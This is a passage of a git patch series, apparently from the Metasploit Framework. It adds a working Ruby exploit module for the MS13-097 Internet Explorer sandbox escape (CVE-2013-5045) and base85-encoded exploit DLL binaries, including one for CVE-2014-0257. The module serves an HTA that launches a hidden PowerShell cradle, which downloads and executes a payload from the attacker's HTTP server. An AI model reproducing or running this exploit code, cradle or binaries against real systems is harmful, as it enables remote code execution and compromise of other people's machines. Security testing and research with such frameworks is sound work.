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 G1pYsu&oL(e literal 0 HcmV?d00001 diff --git a/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb b/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb new file mode 100644 index 0000000000..cb5334af06 --- /dev/null +++ b/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb @@ -0,0 +1,141 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'rex' +require 'msf/core/exploit/exe' +require 'msf/core/exploit/powershell' + +class Metasploit3 < Msf::Exploit::Local + Rank = GreatRanking + + include Msf::Exploit::Powershell + include Msf::Exploit::EXE + include Msf::Exploit::Remote::HttpServer + include Msf::Post::Windows::Priv + + def initialize(info={}) + super( update_info( info, + 'Name' => 'MS13-097 Registry Symlink IE Sandbox Escape', + 'Description' => %q{ + This module exploits a vulnerability in Internet Explorer Sandbox which allows to + escape the Enhanced Protected Mode and execute code with Medium Integrity. The + vulnerability exists in the IESetProtectedModeRegKeyOnly function from the ieframe.dll + component, which can be abused to force medium integrity IE to user influenced keys. + By using registry symlinks it's possible force IE to add a policy entry in the registry + and finally bypass Enhanced Protected Mode. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'James Forshaw', # Vulnerability Discovery and original exploit code + 'juan vazquez' # metasploit module + ], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ], + 'Stance' => Msf::Exploit::Stance::Aggressive, + 'Targets' => + [ + [ 'IE 8 - 11', { } ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => "Dec 10 2013", + 'References' => + [ + ['CVE', '2013-5045'], + ['MSB', 'MS13-097'], + ['BID', '64115'], + ['URL', 'https://github.com/tyranid/IE11SandboxEscapes'] + ] + )) + + register_options( + [ + OptInt.new('DELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]) + ]) + end + + def exploit + print_status("Running module against #{sysinfo['Computer']}") unless sysinfo.nil? + + mod_handle = session.railgun.kernel32.GetModuleHandleA('iexplore.exe') + if mod_handle['return'] == 0 + fail_with(Failure::NotVulnerable, "Not running inside an Internet Explorer process") + end + + unless get_integrity_level == INTEGRITY_LEVEL_SID[:low] + fail_with(Failure::NotVulnerable, "Not running at Low Integrity") + end + + begin + Timeout.timeout(datastore['DELAY']) { super } + rescue Timeout::Error + end + end + + def primer + hta_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(4))}.hta" + session.railgun.kernel32.SetEnvironmentVariableA("HTA_URL", hta_uri) + + html_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(4))}.html" + session.railgun.kernel32.SetEnvironmentVariableA("HTML_URL", html_uri) + + temp = session.sys.config.getenv('TEMP') + + print_status("Loading Exploit Library...") + + session.core.load_library( + 'LibraryFilePath' => ::File.join(Msf::Config.data_directory, "exploits", "CVE-2013-5045", "CVE-2013-5045.dll"), + 'TargetFilePath' => temp + "\\CVE-2013-5045.dll", + 'UploadLibrary' => true, + 'Extension' => false, + 'SaveToDisk' => false + ) + end + + def on_request_uri(cli, request) + if request.uri =~ /\.hta$/ + print_status("Sending hta...") + download_and_run = "IEX ((new-object net.webclient).downloadstring('#{get_uri}/#{rand_text_alpha(4 + rand(4))}.psh'))" + command = "powershell.exe -w hidden -nop -c #{download_and_run}" + hta = <<-eos +<script> +var command = "cmd.exe /c #{command}"; +var shell = new ActiveXObject("WScript.Shell"); +shell.Run(command); +</script> + eos + send_response(cli, hta, {'Content-Type'=>'application/hta'}) + elsif request.uri =~ /\.psh$/ + print_status("Sending psh payload...") + data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded) + send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) + elsif request.uri =~ /\.html$/ + print_status("Sending window close html...") + close_html = <<-eos +<html> +<body> +<script> +window.open('', '_self', ''); +window.close(); +</script> +</body> +</html> + eos + send_response(cli, close_html, { 'Content-Type' => 'text/html' }) + else + send_not_found(cli) + end + end + + def get_dll + path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-5045", "CVE-2013-5045.dll") + dll = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } + + dll + end + +end + From e145298c1314892d40ced509f62f96189a0cf515 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Thu, 29 May 2014 11:45:19 -0500 Subject: [PATCH 404/853] Add module for CVE-2014-0257 --- data/exploits/CVE-2014-0257/CVE-2014-0257.dll | Bin 0 -> 107520 bytes .../windows/local/ms14_009_ie_dfsvc.rb | 124 ++++++++++++++++++ 2 files changed, 124 insertions(+) create mode 100755 data/exploits/CVE-2014-0257/CVE-2014-0257.dll create mode 100644 modules/exploits/windows/local/ms14_009_ie_dfsvc.rb diff --git a/data/exploits/CVE-2014-0257/CVE-2014-0257.dll b/data/exploits/CVE-2014-0257/CVE-2014-0257.dll new file mode 100755 index 0000000000000000000000000000000000000000..ef0eeb3a3c9cbd1739b993a8dc9bdad0a4fa6d05 GIT binary patch literal 107520 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 